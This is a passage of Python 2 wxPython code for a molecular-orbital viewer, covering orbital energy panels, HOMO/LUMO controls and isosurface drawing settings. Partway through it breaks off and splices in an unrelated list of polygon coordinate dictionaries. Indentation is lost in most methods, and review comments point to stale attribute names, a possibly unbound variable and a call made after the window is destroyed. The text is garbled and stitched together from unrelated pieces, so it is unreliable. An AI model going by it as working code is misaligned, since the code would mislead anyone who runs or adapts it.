style=wx.RB_GROUP)
self.rbtsold.Bind(wx.EVT_RADIOBUTTON,self.OnSolid)
yloc += 18
#self.rbtwire=wx.RadioButton(self.panel,-1,"wire",pos=(xloc+10,yloc),size=(45,18))
self.rbtwire=wx.RadioButton(self.panel,-1,"wire",pos=(xloc+40,yloc),size=(40,18))
self.rbtwire.Bind(wx.EVT_RADIOBUTTON,self.OnWire)
self.rbtsold.SetValue(True)
#
yloc += 20
wx.StaticText(self.panel,-1,"Value(abs):" ,pos=(xloc,yloc),size=(70,18))
yloc += 20
self.tcval=wx.TextCtrl(self.panel,-1,'',pos=(xloc+10,yloc),size=(70,18),
style=wx.TE_PROCESS_ENTER)
self.tcval.Bind(wx.EVT_TEXT_ENTER,self.OnValue)
self.tcval.SetToolTipString('Input value and "ENTER"')
yloc += 25
wx.StaticText(self.panel,-1,"Interp:" ,pos=(xloc,yloc),size=(45,18))
self.spip=wx.SpinCtrl(self.panel,-1,value=str(self.interpol),pos=(xloc+45,yloc),size=(35,18),
style=wx.SP_ARROW_KEYS,min=self.minipo,max=self.maxipo)
self.spip.Bind(wx.EVT_SPINCTRL,self.OnInterpolate)
self.spip.SetToolTipString('Choose interpolation points number.')
yloc += 20
wx.StaticText(self.panel,-1,"Color:",pos=(xloc,yloc),size=(55,18))
yloc += 20
wx.StaticText(self.panel,-1,"+",pos=(xloc+5,yloc),size=(10,18))
self.cbcolp=wx.ComboBox(self.panel,-1,'',choices=self.colortxt, \
pos=(xloc+20,yloc-3), size=(60,hcb),style=wx.CB_READONLY)
self.cbcolp.Bind(wx.EVT_COMBOBOX,self.OnColorPos)
self.cbcolp.SetToolTipString('Choose color for positive value. "---" is dummy')
yloc += 25
wx.StaticText(self.panel,-1," -" ,pos=(xloc+5,yloc),size=(10,18))
self.cbcoln=wx.ComboBox(self.panel,-1,'',choices=self.colortxt, \
pos=(xloc+20,yloc-3), size=(60,hcb),style=wx.CB_READONLY)
self.cbcoln.Bind(wx.EVT_COMBOBOX,self.OnColorNeg)
self.cbcoln.SetToolTipString('Choose color for negative value. "---" is dummy')
yloc += 25
wx.StaticText(self.panel,-1,"Opacity:" ,pos=(xloc,yloc),size=(50,18))
self.tcopa=wx.TextCtrl(self.panel,-1,('%4.2f' % self.opacity),pos=(xloc+50,yloc-2),size=(30,18),
style=wx.TE_PROCESS_ENTER)
self.tcopa.SetToolTipString('Input opacity value (0-1) and "ENETR"')
self.tcopa.Bind(wx.EVT_TEXT_ENTER,self.OnOpacity)
#self.ckbimp.SetValue(self.superimpose)
yloc += 20
wx.StaticLine(self.panel,pos=(-1,yloc),size=(w,2),style=wx.LI_HORIZONTAL)
#yloc += 25
yloc += 8
wx.StaticText(self.panel,-1,"Object:" ,pos=(xloc,yloc),size=(50,18))
yloc += 18
self.cmbobj=wx.ComboBox(self.panel,-1,'',choices=self.cubeobjlst, \
pos=(xloc+5,yloc), size=(75,hcb),style=wx.CB_READONLY)
self.cmbobj.Bind(wx.EVT_COMBOBOX,self.OnObject)
self.cmbobj.SetToolTipString('Choose object for operations')
yloc += 25
self.ckbimp=wx.CheckBox(self.panel,-1,"superimpose",pos=(xloc,yloc),size=(120,18))
self.ckbimp.Bind(wx.EVT_CHECKBOX,self.OnSuperimpose)
self.ckbimp.SetToolTipString('Check for superimpose objects')
yloc += 25
self.btndel=wx.Button(self.panel,wx.ID_ANY,"Del",pos=(xloc,yloc),size=(30,20))
self.btndel.Bind(wx.EVT_BUTTON,self.OnDel)
self.btndel.SetToolTipString('Remove object')
self.btndraw=wx.Button(self.panel,wx.ID_ANY,"Draw",pos=(xloc+40,yloc),size=(45,20))
self.btndraw.Bind(wx.EVT_BUTTON,self.OnDraw)
self.btndraw.SetToolTipString('Draw cube data(toggle "on" and "off")')
def CreateOrbitalPanel(self,idata):
size=self.GetClientSize()
w=size[0]; h=size[1]
w=self.orbitalpanwidth
xpanpos=self.plotterpanwidth+idata*self.orbitalpanwidth
ff='%5.0f'
# upper panel
id=wx.NewId()
panel=wx.Panel(self,id,pos=(xpanpos,0),size=(w,h)) #ysize))
panel.SetBackgroundColour(self.bgcolor)
self.widgetiddic[id]=[idata,'Panel',panel]
# cubedata
yloc=5; xloc=15
#sttit=wx.StaticText(panel,-1,label=self.orbtitle[idata],pos=(xloc,yloc),size=(w-10,18))
id=wx.NewId()
label=wx.StaticText(panel,id,label=self.orbtitle[idata],pos=(xloc,yloc),size=(w-10,18))
self.widgetiddic[id]=[idata,'Label',label]
label.Bind(wx.EVT_LEFT_DOWN,self.OnOrbTitleLeftClick)
label.SetToolTipString('L-Click to be avtive')
wx.StaticLine(panel,pos=(0,0),size=(4,h),style=wx.LI_VERTICAL)
#ststit.SetToolTipString('Choose drawing style')
yloc += 25
self.wplt=self.orbitalpanwidth-25 #90;
self.hplt=125
id=wx.NewId()
orbgraph=graph.EnergyGraph(panel,id,[xloc,yloc],[self.wplt,self.hplt],'white',retobj=self) #yloc += 25
orbgraph.SetToolTipString('L-Click a bar for select. L-Drag for move plot window')
self.widgetiddic[id]=[idata,'Graph',orbgraph]
#
yloc += self.hplt+10
id=wx.NewId()
btnrdc=wx.Button(panel,id,"<",pos=(xloc,yloc),size=(20,20))
btnrdc.Bind(wx.EVT_BUTTON,self.OnOrbReduce)
btnrdc.SetToolTipString('"<" ("<") key press also reduces/magnifies')
btnrdc.Bind(wx.EVT_KEY_DOWN,self.OnOrbKeyDown)
self.widgetiddic[id]=[idata,'Reduce',btnrdc]
id=wx.NewId()
btnmag=wx.Button(panel,id,">",pos=(xloc+25,yloc),size=(20,20))
btnmag.Bind(wx.EVT_BUTTON,self.OnOrbMagnify)
self.widgetiddic[id]=[idata,'Magnify',btnmag]
btnmag.SetToolTipString('"<" ("<") key press also reduces/magnifies')
btnmag.Bind(wx.EVT_KEY_DOWN,self.OnOrbKeyDown)
id=wx.NewId()
btnset=wx.Button(panel,id,"Reset",pos=(xloc+50,yloc),size=(40,20))
btnset.Bind(wx.EVT_BUTTON,self.OnOrbReset)
btnset.SetToolTipString('Reset draw size')
self.widgetiddic[id]=[idata,'Reset',btnset]
yloc += 25
wx.StaticLine(panel,pos=(-1,yloc),size=(w,2),style=wx.LI_HORIZONTAL)
yloc += 8
storb=wx.StaticText(panel,-1,label='Orb:',pos=(xloc,yloc),size=(30,18))
id=wx.NewId()
tcorb=wx.TextCtrl(panel,id,str(self.homoorbnmblst[idata]),pos=(xloc+30,yloc),size=(35,18),
style=wx.TE_PROCESS_ENTER)
tcorb.Bind(wx.EVT_TEXT_ENTER,self.OnEnterOrbitalNumber)
tcorb.SetToolTipString('Input orbital number and "ENTER"')
self.widgetiddic[id]=[idata,'Orb',tcorb]
id=wx.NewId()
btnab=wx.ToggleButton(panel,id,'',pos=(xloc+70,yloc),size=(20,20))
btnab.Bind(wx.EVT_TOGGLEBUTTON,self.OnOrbSpin)
btnab.SetToolTipString('Toggle switch for select alpha or beta orbitals(open shell only')
self.widgetiddic[id]=[idata,'Spin',btnab]
try:
if len(self.data) == 1: btnab.Disable()
else:
self.spin[idata]='a'
btnab.SetLabel(self.spin[idata])
btnab.Refresh()
except: pass
yloc += 25
sthom=wx.StaticText(panel,-1,label='HOMO -',pos=(xloc,yloc),size=(45,18))
id=wx.NewId()
schom=wx.SpinCtrl(panel,id,value=str(self.homominus[idata]),pos=(xloc+45,yloc),size=(45,18),
style=wx.SP_ARROW_KEYS,min=self.minhomo[idata],max=self.maxhomo[idata])
schom.Bind(wx.EVT_SPINCTRL,self.OnOrbHOMO)
schom.SetToolTipString('Set orbital number relative to HOMO')
self.widgetiddic[id]=[idata,'HOMO',schom]
yloc += 25
stlum=wx.StaticText(panel,-1,label='LUMO +',pos=(xloc,yloc),size=(45,18))
id=wx.NewId()
sclum=wx.SpinCtrl(panel,id,value=str(self.lumoplus[idata]),pos=(xloc+45,yloc),size=(45,18),
style=wx.SP_ARROW_KEYS,min=self.minlumo[idata],max=self.maxlumo[idata])
sclum.SetToolTipString('Set orbital number relative to LUMO')
sclum.Bind(wx.EVT_SPINCTRL,self.OnOrbLUMO)
self.widgetiddic[id]=[idata,'LUMO',sclum]
yloc += 25
id=wx.NewId()
btncls=wx.Button(panel,id,"Close",pos=(xloc-5,yloc),size=(45,20))
btncls.Bind(wx.EVT_BUTTON,self.OnOrbClose)
btncls.SetToolTipString('Close this panel')
self.widgetiddic[id]=[idata,'Close',btncls]
id=wx.NewId()
btnapl=wx.Button(panel,id,"Aplly",pos=(xloc+50,yloc),size=(45,20))
btnapl.Bind(wx.EVT_BUTTON,self.OnOrbApply)
btnapl.SetToolTipString('Apply the orbital specified in "Orb" for draw')
self.widgetiddic[id]=[idata,'Aplly',btnapl]
#
self.SetOrbLabelColor(self.curdata)
#self.PlotEnergy()
#self.RefreshGraphPanel()
def OnOrbTitleLeftClick(self,event):
id=event.GetId()
self.curdata=self.widgetiddic[id][0]
print 'id,curdata',id,self.curdata
self.SetOrbLabelColor(self.curdata)
event.Skip()
def PlotEnergy(self):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Graph':
lst[2].SetYRange(self.erangemin,self.erangemax)
lst[2].SetData(self.orbitallst[lst[0]])
#lst[2].SetYAxisLabel('Energy (ev)')
lst[2].Plot(True)
def RefreshGraphPanel(self):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Panel':
lst[2].Refresh(); lst[2].Update()
# for orbital energy panel
def OnOrbSpin(self,event):
id=event.GetId()
value=self.widgetiddic[id][2].GetValue()
if value: label='a'
else: label='b'
self.widgetiddic[id][2].SetLabel(label)
self.spin[self.widgetiddic[id][0]]=value
def SetLabelToSpinButton(self,idata,label):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Spin':
if lst[0] == idata:
lst[2].SetLabel(label)
break
def GetLabelOnSpinButton(self,idata):
label=''
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Spin':
if lst[0] == idata:
label=lst[2].GetLabel()
break
return label
def OnOrbKeyDown(self,event):
# ascii:44:'<',46:'>', unicode: 60:'<',62:'>'
keycode=event.GetKeyCode()
if keycode == 46: self.ZoomEnergyGraph(self.curdata,True)
elif keycode == 44: self.ZoomEnergyGraph(self.curdata,False)
def OnOrbMagnify(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
self.ZoomEnergyGraph(idata,True)
def GetGraphObj(self,idata):
graphobj=None
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Graph' and lst[0] == idata:
graphobj=lst[2]; break
return graphobj
def OnOrbReduce(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
#
self.ZoomEnergyGraph(idata,False)
def ZoomEnergyGraph(self,idata,magnify):
graphobj=self.GetGraphObj(idata)
#
ymin,ymax=graphobj.GetYRange()
yinc=1.0
if magnify: ymin += yinc; ymax -= yinc
else: ymin -= yinc; ymax += yinc
#
graphobj.SetYRange(ymin,ymax)
graphobj.Plot(True)
def SetFocusOnOrbPanel(self,idata):
print 'SetFocuson',idata
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Panel' and lst[0] == idata:
panel=lst[2]; break
panel.SetFocus()
def SetOrbLabelColor(self,idata):
# widgetiddic:{id:[idata,label,obj],...}
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Label':
if lst[0] == idata: color='red'
else: color='black'
lst[2].SetForegroundColour(color)
lst[2].Refresh()
self.curdata=idata
def OnOrbReset(self,event):
# reset energy graph color
graphobj=self.GetGraphObj(self.curdata)
#
ymin=self.erangemin
ymax=self.erangemax
graphobj.SetYRange(ymin,ymax)
graphobj.Plot(True)
def OnOrbApply(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=0
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Orb' and lst[0] == idata:
value=lst[2].GetValue()
break
print 'value in Apply',value
    def OnOrbClose(self,event):
        """Close one orbital panel: drop its data and rebuild the whole window.

        The frame is destroyed and re-opened via the parent's orbital
        controller so the remaining panels get laid out again.
        NOTE(review): SetPosition is called on self *after* Destroy() --
        confirm the intent (the reopened frame likely needs the position).
        NOTE(review): OpenDrawOrbitalWin is not defined on the visible
        DrawOrbital class (which has OpenDrawWin) -- verify the method name.
        """
        id=event.GetId()
        idata=self.curdata #self.widgetiddic[id][0]
        pos=self.GetPosition()
        try: del self.orbitallst[idata]
        except: pass
        self.parent.orbobj.SetOrbitalList(self.orbitallst)
        self.Destroy()
        self.parent.orbobj.OpenDrawOrbitalWin(self.orbitallst)
        self.SetPosition(pos)
def GetOrbitalNumberInTC(self):
idata=self.curdata
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Orb' and lst[0] == idata:
orbnmb=lst[2].GetValue()
orbnmb=int(orbnmb)
return orbnmb
def OnEnterOrbitalNumber(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=self.widgetiddic[id][2].GetValue()
self.SetOrbValueToHOMOLUMO(idata,int(value))
def OnOrbHOMO(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=self.widgetiddic[id][2].GetValue()
orbnmb=self.homoorbnmblst[idata]-value
if orbnmb <= 1: orbnmb=1
self.SetOrbValueToOrbTC(idata,orbnmb)
def SetOrbValueToHOMOLUMO(self,idata,value):
homo=self.homoorbnmblst[idata]
lumo=homo+1
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'HOMO' and lst[0] == idata:
sval=homo-value
if sval < 0: sval=0
lst[2].SetValue(sval)
lst[2].Refresh()
if lst[1] == 'LUMO' and lst[0] == idata:
sval=value-lumo
if sval < 0: sval=0
lst[2].SetValue(sval)
lst[2].Refresh()
def SetOrbValueToOrbTC(self,idata,orbnmb):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Orb' and lst[0] == idata:
lst[2].SetValue(str(orbnmb))
lst[2].Refresh()
self.SetOrbValueToHOMOLUMO(idata,orbnmb)
label=self.GetLabelOnSpinButton(idata)
if label == 'a': spin=0
elif label == 'b': spin=1
else: spin=-1
graphobj=self.GetGraphObj(idata)
graphobj.SelectOrbital(spin,orbnmb)
def SelectedOrbFromEnergyGraph(self,spin,orbnmb):
self.SetOrbValueToOrbTC(self.curdata,orbnmb)
if spin == 0: label='a'
elif spin == 1: label='b'
else: label=''
self.SetLabelToSpinButton(self.curdata,label)
def OnOrbLUMO(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=self.widgetiddic[id][2].GetValue()
orbnmb=self.homoorbnmblst[idata]+1+value
if orbnmb > self.maxorbnmblst[idata]: orbnmb=self.maxorbnmblst[idata]
self.SetOrbValueToOrbTC(idata,orbnmb)
# for cube plotter panel
    def OnDel(self,event):
        """'Del' button: remove the currently selected plot object from the list.

        NOTE(review): references self.objectlst, self.ckbobj and self.ckhobj,
        none of which are created in this file (CreatePlotterPanel builds
        self.cubeobjlst and self.cmbobj) -- presumably stale names; verify.
        NOTE(review): `idx` may be unbound below when .index() raises and
        the bare except swallows it -- TODO confirm intended behavior.
        """
        if len(self.objectlst) <= 1:
            # can not delete but close all
            return
        object=self.ckbobj.GetValue().strip()
        # remove plot
        try: idx=self.objectlst.index(object)
        except: pass
        if idx >= 1:
            del self.objectlst[idx]
            self.ckhobj.SetValue(self.objectlst[idx-1])
def OnObject(self,event):
print 'curobj',self.curobj
self.curobj=self.ckbobj.GetValue().strip()
def OnSuperimpose(self,event):
self.superimpose=self.ckbimp.GetValue()
print 'superimpose',self.superimpose
def GetCubeFileAndMakeCubeObjDic(self):
filename=self.viewer.GetCubeFile()
if os.path.exists(filename):
base,ext=os.path.splitext(filename)
self.cubefile=filename
if ext == '.den' or ext == '.mep' or ext == '.cub':
err=self.AddToCubeObjDic(filename)
else:
mess='The file "'+filename+'" is not cube data (ext should be ".mep" or ".den"'
lib.MessageBoxOK(mess,"")
self.OnClose(1)
else:
mess='Cube file is not found. filename="'+filename+'"'
lib.MessageBoxOK(mess,"")
self.OnClose(1)
def GetDrawPanelParams(self):
#self.ondraw=self.btndraw.GetValue()
return [self.style,self.value,self.interpol,self.colorpos,self.colorneg,
self.opacity,self.ondraw]
def SetDrawPanelParams(self,params):
self.style=params[0]; self.value=params[1]; self.interpol=params[2]
self.colorpos=params[3]; self.colorneg=params[4]; self.opacity=params[5]
self.ondraw=params[6]
self.SetParamsToWidgets()
def SetParamsToWidgets(self):
    # Push the current draw-panel attributes back into their widgets.
    # style 0 = solid (the default radio set below), 1 = wireframe.
    self.rbtsold.SetValue(True)
    if self.style == 1: self.rbtwire.SetValue(True)
    # Isosurface value goes into a text control, hence str().
    self.tcval.SetValue(str(self.value))
    self.spip.SetValue(self.interpol)
    self.cbcolp.SetValue(self.colorpos) #StringSelection(self.colorpos)
    self.cbcoln.SetValue(self.colorneg)
-0.337218966457),
(-0.646195113652, -0.33706657095),
(-0.651832284777, -0.336912175174),
(-0.657460070718, -0.336755757338),
(-0.663078327691, -0.336597294951),
(-0.668686909161, -0.336436764791),
(-0.674285665754, -0.336274142883),
(-0.67987444516, -0.336109404467),
(-0.685453092043, -0.335942523975),
(-0.691021447941, -0.335773474994),
(-0.696579351168, -0.335602230244),
(-0.702126636711, -0.335428761544),
(-0.707663136126, -0.335253039779),
(-0.713188677433, -0.335075034873),
(-0.718703085006, -0.334894715749),
(-0.724206179462, -0.334712050303),
(-0.729697777548, -0.334527005364),
(-0.735177692023, -0.334339546661),
(-0.74064573154, -0.33414963879),
(-0.746101700528, -0.333957245169),
(-0.751545399061, -0.333762328011),
(-0.756976622739, -0.333564848278),
(-0.762395162555, -0.333364765644),
(-0.767800804765, -0.333162038458),
(-0.773193330752, -0.332956623698),
(-0.778572516889, -0.332748476935),
(-0.783938134403, -0.332537552286),
(-0.789289949229, -0.332323802375),
(-0.794627721865, -0.332107178286),
(-0.799951207224, -0.331887629519),
(-0.800061826877, -0.329067305958),
(-0.800171433161, -0.326245745465),
(-0.800280027946, -0.323422960291),
(-0.800387613092, -0.32059896265),
(-0.800494190456, -0.317773764719),
(-0.800599761888, -0.31494737864),
(-0.800704329231, -0.312119816518),
(-0.800807894323, -0.309291090424),
(-0.800910458993, -0.306461212392),
(-0.801012025066, -0.303630194427),
(-0.801112594355, -0.300798048496),
(-0.80121216867, -0.297964786535),
(-0.801310749808, -0.295130420449),
(-0.801408339562, -0.292294962109),
(-0.801504939714, -0.289458423355),
(-0.801600552037, -0.286620815998),
(-0.801695178296, -0.283782151816),
(-0.801788820245, -0.280942442558),
(-0.801881479629, -0.278101699945),
(-0.801973158184, -0.275259935665),
(-0.802063857634, -0.272417161382),
(-0.802153579693, -0.269573388726),
(-0.802242326064, -0.266728629303),
(-0.802330098439, -0.26388289469),
(-0.802416898499, -0.261036196436),
(-0.802502727912, -0.258188546063),
(-0.802587588336, -0.255339955066),
(-0.802671481416, -0.252490434913),
(-0.802754408783, -0.249639997048),
(-0.802836372059, -0.246788652886),
(-0.802917372849, -0.243936413817),
(-0.802997412748, -0.241083291206),
(-0.79764025035, -0.241234499334),
(-0.79226904346, -0.24138372094),
(-0.786884040618, -0.241530994487),
(-0.781485484466, -0.241676356932),
(-0.776073611906, -0.241819843776),
(-0.770648654251, -0.241961489114),
(-0.765210837369, -0.242101325684),
(-0.759760381837, -0.242239384909),
(-0.754297503078, -0.242375696948),
(-0.748822411508, -0.242510290738),
(-0.74333531267, -0.242643194038),
(-0.737836407371, -0.242774433474),
(-0.732325891817, -0.242904034577),
(-0.726803957741, -0.243032021826),
(-0.721270792533, -0.243158418691),
(-0.715726579366, -0.243283247663),
(-0.710171497315, -0.243406530303),
(-0.704605721484, -0.243528287271),
(-0.699029423118, -0.243648538363),
(-0.693442769724, -0.243767302551),
(-0.687845925177, -0.243884598012),
(-0.682239049841, -0.244000442164),
(-0.676622300667, -0.244114851695),
(-0.670995831307, -0.244227842601),
(-0.665359792212, -0.244339430211),
(-0.659714330739, -0.244449629216),
(-0.654059591243, -0.244558453705),
(-0.648395715183, -0.244665917183),
(-0.642722841208, -0.244772032609),
(-0.637041105256, -0.244876812412),
(-0.631350640639, -0.244980268524),
(-0.625651578135, -0.245082412402)]},
30: {'color': 'skyblue',
'polygon': [(0.788068525473, -0.145310501727),
(0.788023290986, -0.148190934934),
(0.787977160072, -0.151070866231),
(0.787930131991, -0.153950285308),
(0.787882205996, -0.156829181827),
(0.787833381333, -0.159707545422),
(0.787783657241, -0.162585365701),
(0.787733032954, -0.165462632241),
(0.787681507698, -0.168339334593),
(0.787629080695, -0.171215462277),
(0.787575751162, -0.174091004786),
(0.787521518309, -0.176965951583),
(0.787466381342, -0.1798402921),
(0.787410339463, -0.182714015741),
(0.787353391869, -0.185587111879),
(0.787295537754, -0.188459569858),
(0.787236776306, -0.191331378991),
(0.787177106714, -0.194202528559),
(0.787116528159, -0.197073007814),
(0.787055039824, -0.199942805975),
(0.786992640886, -0.202811912233),
(0.786929330521, -0.205680315745),
(0.786865107905, -0.208548005637),
(0.786799972212, -0.211414971004),
(0.786733922613, -0.21428120091),
(0.786666958282, -0.217146684385),
(0.786599078389, -0.220011410428),
(0.786530282108, -0.222875368008),
(0.78646056861, -0.225738546059),
(0.786389937069, -0.228600933484),
(0.786318386661, -0.231462519155),
(0.786245916561, -0.23432329191),
(0.78617252595, -0.237183240557),
(0.78078038121, -0.237333277422),
(0.775375635617, -0.23748105218),
(0.769958431125, -0.237626635267),
(0.764528910058, -0.237770093694),
(0.759087215015, -0.237911491176),
(0.753633488771, -0.238050888263),
(0.748167874187, -0.238188342468),
(0.742690514127, -0.238323908386),
(0.737201551369, -0.238457637814),
(0.731701128528, -0.238589579865),
(0.726189387981, -0.238719781082),
(0.720666471795, -0.238848285543),
(0.715132521656, -0.23897513497),
(0.709587678806, -0.239100368829),
(0.704032083979, -0.239224024427),
(0.698465877342, -0.239346137011),
(0.692889198443, -0.239466739859),
(0.687302186152, -0.239585864369),
(0.681704978617, -0.239703540148),
(0.676097713213, -0.239819795095),
(0.6704805265, -0.239934655482),
(0.664853554184, -0.240048146032),
(0.659216931071, -0.240160289996),
(0.653570791039, -0.240271109228),
(0.647915267001, -0.240380624251),
(0.642250490872, -0.240488854331),
(0.636576593544, -0.240595817537),
(0.630893704857, -0.240701530812),
(0.625201953577, -0.240806010026),
(0.619501467371, -0.240909270041),
(0.61379237279, -0.241011324765),
(0.608074795251, -0.241112187208),
(0.608124854535, -0.238201081017),
(0.608174276135, -0.235289251871),
(0.608223061095, -0.232376709583),
(0.608271210445, -0.229463463933),
(0.608318725206, -0.226549524669),
(0.608365606382, -0.223634901512),
(0.608411854968, -0.220719604148),
(0.608457471945, -0.217803642236),
(0.608502458281, -0.214887025405),
(0.608546814934, -0.211969763253),
(0.608590542846, -0.209051865349),
(0.608633642949, -0.206133341233),
(0.608676116162, -0.203214200415),
(0.60871796339, -0.20029445238),
(0.608759185527, -0.197374106581),
(0.608799783455, -0.194453172443),
(0.608839758042, -0.191531659366),
(0.608879110144, -0.188609576721),
(0.608917840604, -0.185686933852),
(0.608955950255, -0.182763740075),
(0.608993439915, -0.179840004683),
(0.609030310391, -0.176915736938),
(0.609066562476, -0.173990946082),
(0.609102196951, -0.171065641326),
(0.609137214587, -0.168139831859),
(0.60917161614, -0.165213526846),
(0.609205402354, -0.162286735426),
(0.609238573962, -0.159359466713),
(0.609271131683, -0.1564317298),
(0.609303076224, -0.153503533756),
(0.609334408281, -0.150574887625),
(0.609365128536, -0.147645800431),
(0.615099847591, -0.147585647078),
(0.620826243251, -0.147524833585),
(0.626544189246, -0.147463351981),
(0.632253557801, -0.147401193464),
(0.637954219638, -0.147338348346),
(0.64364604397, -0.147274805997),
(0.649328898505, -0.147210554781),
(0.65500264945, -0.147145581994),
(0.660667161514, -0.147079873799),
(0.666322297914, -0.147013415155),
(0.671967920381, -0.146946189749),
(0.677603889177, -0.146878179921),
(0.683230063097, -0.146809366588),
(0.68884629949, -0.146739729165),
(0.694452454271, -0.146669245483),
(0.700048381941, -0.146597891705),
(0.705633935604, -0.146525642239),
(0.711208966993, -0.146452469644),
(0.716773326491, -0.146378344542),
(0.722326863159, -0.146303235515),
(0.727869424768, -0.146227109011),
(0.733400857824, -0.146149929236),
(0.73892100761, -0.14607165805),
(0.744429718219, -0.145992254857),
(0.749926832595, -0.14591167649),
(0.755412192571, -0.145829877097),
(0.760885638925, -0.145746808017),
(0.766347011415, -0.145662417659),
(0.771796148842, -0.14557665137),
(0.777232889097, -0.14548945131),
(0.782657069222, -0.145400756307),
(0.788068525473, -0.145310501727)]},
31: {'color': 'skyblue',
'polygon': [(0.596197771756, -0.147747435163),
(0.596169756351, -0.150679304635),
(0.596141147159, -0.153610735294),
(0.596111943517, -0.156541718187),
(0.596082144753, -0.159472244338),
(0.596051750182, -0.162402304749),
(0.596020759105, -0.1653318904),
(0.595989170813, -0.168260992245),
(0.595956984584, -0.171189601216),
(0.595924199684, -0.174117708222),
(0.595890815366, -0.177045304146),
(0.595856830872, -0.179972379847),
(0.595822245431, -0.182898926157),
(0.595787058259, -0.185824933886),
(0.595751268562, -0.188750393816),
(0.595714875532, -0.191675296702),
(0.595677878348, -0.194599633275),
(0.595640276177, -0.197523394238),
(0.595602068175, -0.200446570265),
(0.595563253485, -0.203369152006),
(0.595523831235, -0.206291130081),
(0.595483800544, -0.209212495082),
(0.595443160517, -0.212133237574),
(0.595401910247, -0.215053348093),
(0.595360048812, -0.217972817144),
(0.595317575281, -0.220891635206),
(0.595274488708, -0.223809792727),
(0.595230788136, -0.226727280124),
(0.595186472593, -0.229644087786),
(0.595141541097, -0.232560206072),
(0.595095992652, -0.235475625308),
(0.595049826249, -0.238390335793),
(0.595003040867, -0.241304327791),
(0.589258429729, -0.241405089031),
(0.583505861081, -0.241504708082),
(0.5777454541, -0.241603193966),
(0.571977326763, -0.241700555105),
(0.566201595834, -0.24179679936),
(0.560418376867, -0.24189193407),
(0.554627784202, -0.241985966089),
(0.548829930961, -0.242078901823),
(0.543024929057, -0.24217074726),
(0.537212889187, -0.242261508006),
(0.531393920844, -0.242351189311),
(0.525568132315, -0.242439796106),
(0.519735630692, -0.24252733302),
(0.513896521875, -0.242613804416),
(0.508050910583, -0.24269921441),
(0.502198900361, -0.242783566895),
(0.496340593594, -0.242866865567),
(0.490476091511, -0.242949113943),
(0.484605494204, -0.243030315379),
(0.478728900637, -0.243110473095),
(0.472846408658, -0.243189590184),
(0.466958115018, -0.243267669637),
(0.461064115382, -0.243344714353),
(0.455164504346, -0.243420727153),
(0.449259375452, -0.243495710797),
(0.443348821208, -0.243569667994),
(0.437432933102, -0.243642601413),
(0.431511801619, -0.243714513695),
(0.425585516264, -0.243785407463),
(0.419654165577, -0.243855285328),
(0.413717837152, -0.243924149901),
(0.40777661766, -0.243992003797),
(0.407805338869, -0.241045639265),
(0.407833675623, -0.238098609115),
(0.407861628376, -0.235150922205),
(0.407889197571, -0.232202587363),
(0.407916383642, -0.229253613395),
(0.407943187014, -0.226304009076),
(0.407969608103, -0.22335378316),
(0.407995647314, -0.220402944372),
(0.408021305045, -0.217451501414),
(0.408046581684, -0.214499462962),
(0.408071477611, -0.211546837667),
(0.408095993197, -0.208593634158),
(0.408120128805, -0.205639861037),
(0.408143884788, -0.202685526886),
(0.408167261494, -0.19973064026),
(0.408190259261, -0.196775209694),
(0.40821287842, -0.193819243699),
(0.408235119293, -0.190862750764),
(0.408256982196, -0.187905739357),
(0.408278467437, -0.184948217924),
(0.408299575317, -0.181990194889),
(0.40832030613, -0.179031678656),
(0.408340660162, -0.176072677608),
(0.408360637693, -0.17311320011),
(0.408380238997, -0.170153254503),
(0.408399464339, -0.167192849113),
(0.408418313981, -0.164231992244),
(0.408436788176, -0.161270692183),
(0.408454887171, -0.158308957198),
(0.408472611207, -0.15534679554),
(0.408489960521, -0.15238421544),
(0.408506935342, -0.149421225114),
(0.414460968763, -0.149378297906),
(0.420410187231, -0.149334766989),
(0.426354507504, -0.149290632092),
(0.432293845442, -0.149245893022),
(0.438228115982, -0.149200549659),
(0.444157233114, -0.149154601942),
(0.450081109854, -0.149108049869),
(0.455999658224, -0.149060893486),
(0.461912789221, -0.149013132873),
(0.467820412799, -0.148964768139),
(0.473722437842, -0.148915799406),
(0.479618772139, -0.148866226801),
(0.485509322365, -0.148816050438),
(0.491393994053, -0.148765270405),
(0.497272691572, -0.148713886748),
(0.503145318109, -0.148661899455),
(0.50901177564, -0.148609308434),
(0.514871964914, -0.148556113501),
(0.520725785428, -0.148502314349),
(0.526573135412, -0.148447910537),
(0.532413911801, -0.148392901456),
(0.538248010221, -0.148337286312),
(0.54407532497, -0.148281064096),
(0.549895748999, -0.148224233559),
(0.555709173893, -0.148166793179),
(0.561515489857, -0.148108741132),
(0.567314585699, -0.148050075261),
(0.573106348814, -0.14799079304),
(0.578890665172, -0.147930891536),
(0.584667419306, -0.147870367379),
(0.590436494295, -0.147809216714),
(0.596197771756, -0.147747435163)]},
32: {'color': 'skyblue',
'polygon': [(0.394696633387, -0.149424365211),
(0.39467879205, -0.152389107312),
(0.394660590174, -0.155353441224),
(0.39464202756, -0.158317358771),
(0.394623104005, -0.161280851758),
(0.394603819299, -0.164243911975),
(0.394584173229, -0.167206531192),
(0.394564165574, -0.170168701163),
(0.394543796107, -0.173130413623),
(0.394523064596, -0.176091660289),
(0.394501970803, -0.179052432857),
(0.394480514483, -0.182012723007),
(0.394458695386, -0.184972522396),
(0.394436513253, -0.187931822663),
(0.394413967821, -0.190890615426),
(0.394391058819, -0.193848892282),
(0.39436778597, -0.196806644806),
(0.394344148987, -0.199763864555),
(0.39432014758, -0.20272054306),
(0.394295781449, -0.205676671831),
